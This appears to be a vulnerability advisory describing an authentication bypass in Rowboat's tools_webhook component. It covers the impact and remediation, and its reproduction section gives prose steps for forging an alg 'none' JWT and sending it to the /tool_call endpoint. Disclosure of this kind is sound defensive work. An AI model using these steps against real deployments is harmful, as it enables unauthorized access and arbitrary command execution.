Rowboat Labs Rowboat Authentication Bypass Vulnerability in Tools Webhook Component

An authentication bypass vulnerability has been identified in Rowboat Labs' Rowboat application, specifically in versions through 0.1.67. The issue resides in the tools_webhook component, within the function tool_call of the file apps/experimental/tools_webhook/app.py. This vulnerability allows remote, unauthenticated attackers to manipulate the X-Tools-JWE header, leading to improper authentication by exploiting the application's JSON Web Token (JWT) validation process. The server's JWT parsing logic fails to enforce secure algorithm requirements, allowing attackers to forge tokens and bypass authentication entirely.

Impact

Exploitation of this vulnerability allows attackers to impersonate any user or service account by forging administrative tokens, bypass authentication requirements for the /tool_call endpoint, and execute arbitrary tool commands within the Rowboat environment.

Reproduction

To reproduce this vulnerability, first ensure that the Rowboat tools webhook service is running, typically on port 5000. Then, craft a malicious JWT by setting the 'alg' header to 'none', which disables signature verification. Send a POST request to the '/tool_call' endpoint with the forged token in the 'X-Tools-JWE' header. The server will process the request without validating the token's signature, allowing unauthorized access to the tool call functionality.

Remediation

It is recommended to update the JWT verification logic to only allow secure, predefined algorithms, such as HS256 or RS256, and to reject any tokens that specify 'none' as the algorithm.